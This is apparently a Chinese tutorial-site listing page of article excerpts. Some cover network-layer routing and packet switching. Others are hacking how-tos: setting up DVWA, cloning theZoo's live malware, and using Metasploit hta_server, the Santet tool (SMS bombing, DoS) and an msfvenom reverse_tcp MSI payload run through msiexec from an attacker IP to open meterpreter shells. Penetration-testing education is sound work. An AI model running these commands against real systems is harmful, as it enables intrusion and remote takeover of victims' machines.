找到 1282 篇文章 关于 MCA

数据报网络中的路由

Moumita
更新于 2020年11月28日 08:15:34

2K+ 浏览量

在使用数据报的数据包交换网络中,数据报是包含足够报头信息的数据包,以便所有中间交换设备可以将其单独路由到目的地。由于通信是通过数据报进行的,因此这些网络被称为数据报网络。路由原理在数据报网络中,即使属于同一消息,每个数据包也会从源路由到目的地,而无需为各个数据包预先分配资源或信道。由于数据报被视为独立单元,因此不会为数据传输固定专用路径。每个数据报由中间路由器路由…… 阅读更多

存储转发分组交换

Moumita
更新于 2020年11月28日 08:14:15

15K+ 浏览量

在电信中,存储转发分组交换是一种技术,其中数据包在转发到下一个节点之前存储在每个中间节点中。中间节点在传输之前检查数据包是否无错误,从而确保数据包的完整性。通常,网络层在一个使用存储转发分组交换的环境中运行。工作原理具有要发送的数据包的节点将其传递给最近的节点,即路由器。数据包存储在路由器中,直到它完全到达并且其校验和被验证以进行错误检测…… 阅读更多

网络层设计问题

Moumita
更新于 2020年11月28日 08:12:16

40K+ 浏览量

OSI(开放系统互连)模型的网络层或第 3 层负责跨多个跳点或链路将数据包从源传递到目的地。它是关注端到端传输的最低层。关注此层设计的设计人员需要处理某些问题。这些问题包括提供给上层层的服务以及该层的内部设计。设计问题可以在四个方面详细说明:存储转发分组交换传输层服务提供面向连接的服务提供无连接…… 阅读更多

网络层的功能

Moumita
更新于 2020年11月28日 08:11:25

20K+ 浏览量

OSI(开放系统互连)模型的网络层或第 3 层的主要功能是跨多个跳点或链路将数据包从源传递到目的地。它还控制子网的操作。这些功能如下所述:当要发送数据时,网络层从上方的传输层接收数据,将其划分并封装成数据包,然后将其发送到数据链路层。接收数据时执行相反的过程。网络层负责将数据包从源主机路由到目标主机。该…… 阅读更多

计算机网络层

Moumita
更新于 2020年11月28日 08:11:02

757 浏览量

OSI(开放系统互连)模型的网络层或第 3 层负责跨多个跳点或节点将数据包从源传递到目的地。它控制子网的操作。网络层在 OSI 模型中的位置如下图所示:网络层的功能网络层负责将数据包从源主机路由到目标主机。路由可以基于很少更改的静态表;或者它们可以根据网络状况自动更新。许多网络被划分为子网或子网…… 阅读更多

使用 Docker 进行渗透测试

Ajay yadav
更新于 2020年9月23日 12:38:05

275 浏览量

您将学习如何通过简单的步骤使用 docker 配置易受攻击的 Web 应用程序 (DVWA)。Docker 是一个第三方工具,用于创建隔离的环境来执行任何应用程序。这些应用程序使用容器运行。这些容器是独一无二的,因为它们将应用程序的所有依赖项整合到单个包中并进行部署。点击以下命令进行安装和配置:apt update apt install docker.io systemctl start docker systemctl enable docker 在 Docker 上配置 DVWA Damn Vulnerable Web Application (DVWA) 是一个易受攻击的 PHP/MySQL Web 应用程序。其主要目标是作为一种辅助工具…… 阅读更多

TheZoo 仓库实时恶意软件分析

Ajay yadav
更新于 2020年9月23日 12:33:30

1K+ 浏览量

theZoo 允许研究恶意软件,并使对恶意软件分析感兴趣的人能够访问实时恶意软件,分析其操作方式,甚至可能使高级和精明的人能够在其自身环境中阻止特定恶意软件。git clone https://github.com/ytisf/theZoo cd theZoo pip install --user -r requirements.txt python theZoo.py 我建议在没有互联网连接(或者如果您必须使用内部虚拟网络)且没有来宾添加或任何等效项的虚拟机中运行它们。其中一些是蠕虫,会自动尝试传播。不受约束地运行它们意味着您将感染自己或其他人…… 阅读更多

使用 HTA 文件 (MSHTA.exe) 进行黑客攻击

Ajay yadav
更新于 2020年9月23日 12:31:54

2K+ 浏览量

负责运行我们可以使用 JavaScript 或 VBScript 运行的 HTA(HTML 应用程序)文件的 Windows 操作系统实用程序。您可以使用 Microsoft MSHTA.exe 工具解释这些文件。Metasploit 包含“HTA Web Server”模块,该模块生成恶意 hta 文件。此模块托管一个 HTML 应用程序 (HTA),当打开时,它将通过 Powershell 运行有效负载。恶意 HTA 文件在 Kali linux 中打开 metasploit 并点击以下命令以生成恶意 HTA 文件:use exploit/windows/misc/hta_server set srvhost 192.168.1.109 set lhost 192.168.1.109 exploit 现在通过受害者机器上的 mshta.exe 运行恶意代码以获取 meterpreter 会话。阅读更多

使用 Santet 进行黑客攻击

Ajay yadav
更新于 2020年9月23日 12:30:05

912 浏览量

本文介绍如何使用 Santet 工具进行攻击,该工具集成了多种攻击方式。它允许你创建payload,劫持 Facebook 群组,执行短信轰炸和短信欺骗攻击,以及拒绝服务攻击。请按照以下说明学习如何安装 Santet 并进一步使用它。打开你的 Kali 机器,打开终端并输入以下命令:git clone https://github.com/Gameye98/santet-online 然后使用 cd 命令切换到 santet 目录:cd santet-online 接下来,执行以下命令赋予 santet.py 文件执行权限:chmod +x santet.py,然后运行 python santet.py:如果一切顺利……阅读更多

使用 MSI 包获取反向 Shell

Ajay yadav
更新于 2020年9月23日 12:27:26

2K+ 浏览量

Windows 操作系统自带 Windows Installer 引擎,MSI 包使用该引擎安装应用程序。解释包并安装产品的可执行程序是 Msiexec.exe。通过 msfvenom 启动 msiexec 攻击让我们生成一个 MSI 包文件 (1.msi),使用 Windows Meterpreter payload,如下所示:msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.109 lport=1234 -f msi > 1.msi在目标端,当受害者在远程机器上使用以下工具执行 1.msi 文件时:msiexec /q /i http://192.168.1.109/1.msi攻击者通过启动 multi/handler 作为监听器来获取受害者机器的反向 shell。use exploit/multi/handlerset pyaload windows/meterpreter/reverse_tcpset lhost 192.168.1.109exploit阅读更多

广告